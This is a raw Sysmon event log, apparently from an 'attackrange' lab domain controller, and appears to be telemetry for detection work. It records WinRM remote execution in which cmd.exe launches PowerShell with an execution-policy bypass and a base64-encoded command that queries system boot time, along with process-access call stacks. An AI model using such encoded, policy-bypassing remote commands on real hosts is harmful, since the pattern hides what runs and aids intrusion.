154100x8000000000000000911Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:00:04.721{266CAFBE-6444-6064-ED02-00000000AD01}1660C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe10.0.14393.206 (rs1_release.160915-0644)Windows PowerShellMicrosoft® Windows® Operating SystemMicrosoft CorporationPowerShell.EXEPowerShell -NoProfile -NonInteractive -ExecutionPolicy Unrestricted -EncodedCommand KABHAGUAdAAtAFcAbQBpAE8AYgBqAGUAYwB0ACAALQBDAGwAYQBzAHMATgBhAG0AZQAgAFcAaQBuADMAMgBfAE8AcABlAHIAYQB0AGkAbgBnAFMAeQBzAHQAZQBtACkALgBMAGEAcwB0AEIAbwBvAHQAVQBwAFQAaQBtAGUAC:\Users\Administrator\ATTACKRANGE\Administrator{266CAFBE-6444-6064-36DE-120000000000}0x12de360HighMD5=097CE5761C89434367598B34FE32893B,SHA256=BA4038FD20E474C047BE8AAD5BFACDB1BFC1DDBE12F803F473B7918D8D819436,IMPHASH=CAEE994F79D85E47C06E5FA9CDEAE453{266CAFBE-6444-6064-EC02-00000000AD01}5004C:\Windows\System32\cmd.exeC:\Windows\system32\cmd.exe /C PowerShell -NoProfile -NonInteractive -ExecutionPolicy Unrestricted -EncodedCommand KABHAGUAdAAtAFcAbQBpAE8AYgBqAGUAYwB0ACAALQBDAGwAYQBzAHMATgBhAG0AZQAgAFcAaQBuADMAMgBfAE8AcABlAHIAYQB0AGkAbgBnAFMAeQBzAHQAZQBtACkALgBMAGEAcwB0AEIAbwBvAHQAVQBwAFQAaQBtAGUA 10341000x8000000000000000910Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:00:04.717{266CAFBE-6444-6064-EB02-00000000AD01}44364852C:\Windows\system32\conhost.exe{266CAFBE-6444-6064-EC02-00000000AD01}5004C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x8000000000000000909Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:00:04.701{266CAFBE-62DD-6064-0C00-00000000AD01}8844C:\Windows\system32\svchost.exe{266CAFBE-6437-6064-C302-00000000AD01}4456C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x8000000000000000908Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:00:04.701{266CAFBE-62DD-6064-0C00-00000000AD01}8844C:\Windows\system32\svchost.exe{266CAFBE-6437-6064-C302-00000000AD01}4456C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x8000000000000000907Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:00:04.701{266CAFBE-62DD-6064-0C00-00000000AD01}8844C:\Windows\system32\svchost.exe{266CAFBE-6437-6064-C302-00000000AD01}4456C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x8000000000000000906Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:00:04.701{266CAFBE-62DD-6064-0C00-00000000AD01}8844C:\Windows\system32\svchost.exe{266CAFBE-6437-6064-C302-00000000AD01}4456C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x8000000000000000905Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:00:04.701{266CAFBE-62DD-6064-0C00-00000000AD01}8844C:\Windows\system32\svchost.exe{266CAFBE-6437-6064-C302-00000000AD01}4456C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x8000000000000000904Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:00:04.701{266CAFBE-62DD-6064-0C00-00000000AD01}8844C:\Windows\system32\svchost.exe{266CAFBE-6437-6064-C302-00000000AD01}4456C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x8000000000000000903Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:00:04.701{266CAFBE-62DD-6064-0C00-00000000AD01}8844C:\Windows\system32\svchost.exe{266CAFBE-6437-6064-C302-00000000AD01}4456C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x8000000000000000902Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:00:04.701{266CAFBE-62DD-6064-0C00-00000000AD01}8844C:\Windows\system32\svchost.exe{266CAFBE-6437-6064-C302-00000000AD01}4456C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x8000000000000000901Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:00:04.701{266CAFBE-62C8-6064-0500-00000000AD01}620744C:\Windows\system32\csrss.exe{266CAFBE-6444-6064-EC02-00000000AD01}5004C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5182f 10341000x8000000000000000900Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:00:04.701{266CAFBE-62DD-6064-0C00-00000000AD01}8844C:\Windows\system32\svchost.exe{266CAFBE-6437-6064-C302-00000000AD01}4456C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x8000000000000000899Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:00:04.701{266CAFBE-6444-6064-EA02-00000000AD01}3812796C:\Windows\system32\WinrsHost.exe{266CAFBE-6444-6064-EC02-00000000AD01}5004C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7354|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\system32\WinrsHost.exe+2c94|C:\Windows\system32\WinrsHost.exe+2eb1|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+2759|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b 154100x8000000000000000898Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:00:04.715{266CAFBE-6444-6064-EC02-00000000AD01}5004C:\Windows\System32\cmd.exe10.0.14393.0 (rs1_release.160715-1616)Windows Command ProcessorMicrosoft® Windows® Operating SystemMicrosoft CorporationCmd.ExeC:\Windows\system32\cmd.exe /C PowerShell -NoProfile -NonInteractive -ExecutionPolicy Unrestricted -EncodedCommand 
KABHAGUAdAAtAFcAbQBpAE8AYgBqAGUAYwB0ACAALQBDAGwAYQBzAHMATgBhAG0AZQAgAFcAaQBuADMAMgBfAE8AcABlAHIAYQB0AGkAbgBnAFMAeQBzAHQAZQBtACkALgBMAGEAcwB0AEIAbwBvAHQAVQBwAFQAaQBtAGUAC:\Users\Administrator\ATTACKRANGE\Administrator{266CAFBE-6444-6064-36DE-120000000000}0x12de360HighMD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A{266CAFBE-6444-6064-EA02-00000000AD01}3812C:\Windows\System32\winrshost.exeC:\Windows\system32\WinrsHost.exe -Embedding 10341000x8000000000000000897Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:00:04.701{266CAFBE-62DA-6064-0B00-00000000AD01}856584C:\Windows\system32\lsass.exe{266CAFBE-62DD-6064-1400-00000000AD01}1340C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\lsasrv.dll+10d9e|C:\Windows\system32\lsasrv.dll+1d1e8|C:\Windows\system32\lsasrv.dll+1c411|C:\Windows\system32\lsasrv.dll+1ac30|C:\Windows\system32\lsasrv.dll+2706b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x8000000000000000896Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:00:04.701{266CAFBE-62DA-6064-0B00-00000000AD01}856584C:\Windows\system32\lsass.exe{266CAFBE-62DD-6064-1400-00000000AD01}1340C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\lsasrv.dll+10d9e|C:\Windows\system32\lsasrv.dll+19616|C:\Windows\system32\lsasrv.dll+1abbf|C:\Windows\system32\lsasrv.dll+2706b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x8000000000000000895Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:00:04.701{266CAFBE-62DA-6064-0B00-00000000AD01}856584C:\Windows\system32\lsass.exe{266CAFBE-62DD-6064-1400-00000000AD01}1340C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\lsasrv.dll+1a18d|C:\Windows\system32\lsasrv.dll+2706b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 
10341000x8000000000000000894Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:00:04.686{266CAFBE-62DD-6064-1400-00000000AD01}13401756C:\Windows\system32\svchost.exe{266CAFBE-6444-6064-EA02-00000000AD01}3812C:\Windows\system32\WinrsHost.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\winrscmd.dll+8d36|C:\Windows\system32\winrscmd.dll+92d5|C:\Windows\system32\winrscmd.dll+af31|C:\Windows\system32\winrscmd.dll+23dc|c:\windows\system32\wsmsvc.dll+155ac7|c:\windows\system32\wsmsvc.dll+13f76d|c:\windows\system32\wsmsvc.dll+13f3cf|c:\windows\system32\wsmsvc.dll+13fcb2|c:\windows\system32\wsmsvc.dll+9ab10|c:\windows\system32\wsmsvc.dll+9b611|c:\windows\system32\wsmsvc.dll+4495|c:\windows\system32\wsmsvc.dll+16816c|c:\windows\system32\wsmsvc.dll+1689b8|c:\windows\system32\wsmsvc.dll+16345b|c:\windows\system32\wsmsvc.dll+163125|c:\windows\system32\wsmsvc.dll+14ce9c|c:\windows\system32\wsmsvc.dll+130049|c:\windows\system32\wsmsvc.dll+13571a|c:\windows\system32\wsmsvc.dll+12f47e|c:\windows\system32\wsmsvc.dll+125587|c:\windows\system32\wsmsvc.dll+11f562|c:\windows\system32\wsmsvc.dll+124574 10341000x8000000000000000893Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:00:04.670{266CAFBE-62DD-6064-0C00-00000000AD01}8844C:\Windows\system32\svchost.exe{266CAFBE-6444-6064-EA02-00000000AD01}3812C:\Windows\system32\WinrsHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x8000000000000000892Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:00:04.670{266CAFBE-62DD-6064-0C00-00000000AD01}8844C:\Windows\system32\svchost.exe{266CAFBE-62D4-6064-0700-00000000AD01}700C:\Windows\system32\wininit.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x8000000000000000891Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:00:04.670{266CAFBE-62DD-6064-0C00-00000000AD01}8844C:\Windows\system32\svchost.exe{266CAFBE-62D4-6064-0700-00000000AD01}700C:\Windows\system32\wininit.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x8000000000000000890Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:00:04.670{266CAFBE-62DD-6064-0C00-00000000AD01}8844C:\Windows\system32\svchost.exe{266CAFBE-62D4-6064-0700-00000000AD01}700C:\Windows\system32\wininit.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x8000000000000000889Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:00:04.670{266CAFBE-62DD-6064-0C00-00000000AD01}8844C:\Windows\system32\svchost.exe{266CAFBE-62D4-6064-0700-00000000AD01}700C:\Windows\system32\wininit.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x8000000000000000888Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:00:04.670{266CAFBE-62DD-6064-0C00-00000000AD01}8844C:\Windows\system32\svchost.exe{266CAFBE-62D4-6064-0700-00000000AD01}700C:\Windows\system32\wininit.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x8000000000000000887Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
